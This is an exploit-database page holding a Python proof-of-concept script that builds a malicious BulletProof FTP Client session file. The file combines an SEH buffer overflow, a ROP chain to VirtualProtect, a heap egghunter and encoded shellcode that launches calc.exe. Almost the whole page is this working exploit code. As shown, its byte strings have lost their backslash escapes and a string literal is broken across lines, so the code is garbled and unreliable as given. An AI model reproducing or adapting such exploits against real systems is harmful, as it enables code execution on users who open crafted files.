Home / exploitsPDF  

BulletProof FTP Client 2010 Buffer Overflow

Posted on 21 May 2015

#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Feb 15 2015 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 English #
# Credits: His0k4 #
# CVE: CVE-2008-5753 #
#-----------------------------------------------------------------------------#

#!/usr/bin/python

from struct import pack

# offset to SEH is 93 byte
buf = b'A' * 13
buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L',0x77c4dca8) # ADD ESP,2C # RETN [msvcrt.dll]
buf += b'A' * 18
buf += pack('<L',0x77c1c47f) # POP EBX # POP EBP # RETN 10 [msvcrt.dll]
buf += b'A' * 8
buf += pack('<L',0x74c86a9a) # RETN [oleacc.dll]
buf += b'A' * 10
buf += b'xcexc3x40' # ADD ESP,400 # POP ESI # POP EBX # RETN [bpftpclient.exe]

# ROP chain
rop_gadgets = b''
rop_gadgets += pack('<L',0x77c364d5) # POP EBP # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c364d5) # skip 4 bytes [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xfffffafe) # Value to negate, will become 0x00000501
rop_gadgets += pack('<L',0x7ca82222) # NEG EAX # RETN [shell32.dll]
rop_gadgets += pack('<L',0x77227494) # XCHG EAX,EBX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xffffffc0) # Value to negate, will become 0x00000040
rop_gadgets += pack('<L',0x771bcbe4) # NEG EAX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77f124c8) # XCHG EAX,EDX # RETN [GDI32.dll]
rop_gadgets += pack('<L',0x77c2c343) # POP ECX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c605b5) # &Writable location [msvcrt.dll]
rop_gadgets += pack('<L',0x77c23b47) # POP EDI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c39f92) # RETN (ROP NOP) [msvcrt.dll]
rop_gadgets += pack('<L',0x77c34d9a) # POP ESI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c2aacc) # JMP [EAX] [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c11120) # ptr to &VirtualProtect() [IAT msvcrt.dll]
rop_gadgets += pack('<L',0x77c12df9) # PUSHAD # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c35524) # ptr to 'push esp # ret ' [msvcrt.dll]

# heap-only egghunter
hunter = b'x6ax30x5a' # PUSH 30 # POP EDX
hunter += b'x64x8bx12' # MOV EDX, DWORD PTR FS:[EDX]
hunter += b'x80xc2x90' # ADD DL,90
hunter += b'x8bx12' # MOV EDX, DWORD PTR [EDX]
hunter += b'x8bx12' # MOV EDX, DWORD PTR [EDX]
hunter += b'xebx05' # JMP SHORT
hunter += b'x66x81xcaxffx0f' # OR DX,0FFF
hunter += b'x42x52' # INC EDX # PUSH EDX
hunter += b'x6ax02x58' # PUSH 2 # POP EAX
hunter += b'xcdx2e' # INT 2E
hunter += b'x3cx05' # CMP AL,5
hunter += b'x5a' # POP EDX
hunter += b'x74xef' # JE SHORT
hunter += b'xb8x77x30x30x74' # MOV EAX, w00t
hunter += b'x89xd7' # MOV EDI,EDX
hunter += b'xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'x75xea' # JNZ SHORT
hunter += b'xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'x75xe7' # JNZ SHORT

# copy shellcode back to stack
strcpy = b'x8bxec' # MOV EBP,ESP
strcpy += b'x57x55x55' # PUSH EDI # PUSH EBP # PUSH EBP
strcpy += b'x68x30x60xc4x77' # PUSH ptr to &strcpy [msvcrt.dll]
strcpy += b'xc3' # RET

egg = 'w00t'.encode()

# msfvenom -p windows/exec -b 'x00x0dx0ax1a' -e x86/shikata_ga_nai cmd=calc.exe
shellcode = b''
shellcode += b'xdbxd1xb8xdax92x2cxcaxd9x74x24xf4x5ax31'
shellcode += b'xc9xb1x31x83xc2x04x31x42x14x03x42xcex70'
shellcode += b'xd9x36x06xf6x22xc7xd6x97xabx22xe7x97xc8'
shellcode += b'x27x57x28x9ax6ax5bxc3xcex9exe8xa1xc6x91'
shellcode += b'x59x0fx31x9fx5ax3cx01xbexd8x3fx56x60xe1'
shellcode += b'x8fxabx61x26xedx46x33xffx79xf4xa4x74x37'
shellcode += b'xc5x4fxc6xd9x4dxb3x9exd8x7cx62x95x82x5e'
shellcode += b'x84x7axbfxd6x9ex9fxfaxa1x15x6bx70x30xfc'
shellcode += b'xa2x79x9fxc1x0bx88xe1x06xabx73x94x7exc8'
shellcode += b'x0exafx44xb3xd4x3ax5fx13x9ex9dxbbxa2x73'
shellcode += b'x7bx4fxa8x38x0fx17xacxbfxdcx23xc8x34xe3'
shellcode += b'xe3x59x0exc0x27x02xd4x69x71xeexbbx96x61'
shellcode += b'x51x63x33xe9x7fx70x4exb0x15x87xdcxcex5b'
shellcode += b'x87xdexd0xcbxe0xefx5bx84x77xf0x89xe1x88'
shellcode += b'xbax90x43x01x63x41xd6x4cx94xbfx14x69x17'
shellcode += b'x4axe4x8ex07x3fxe1xcbx8fxd3x9bx44x7axd4'
shellcode += b'x08x64xafxb7xcfxf6x33x16x6ax7fxd1x66'

identifier = b'This is a BulletProof FTP Client Session-File and should not be modified directly.'
host = buf
port = b'21'
name = b'B' + rop_gadgets + hunter + strcpy
password = b'bpfmcidchffddknejf'
local = egg + egg + shellcode

sploit = b"
".join([identifier, host, port, name, password, local])

try:
 print('[*] Creating exploit file...')
 f = open('sploit.bps', 'wb')
 f.write(sploit)
 f.close()
 print('[*] sploit.bps file successfully created!')
except:
 print('[!] Error while creating exploit file!')

 

TOP

Malware :

Exploits :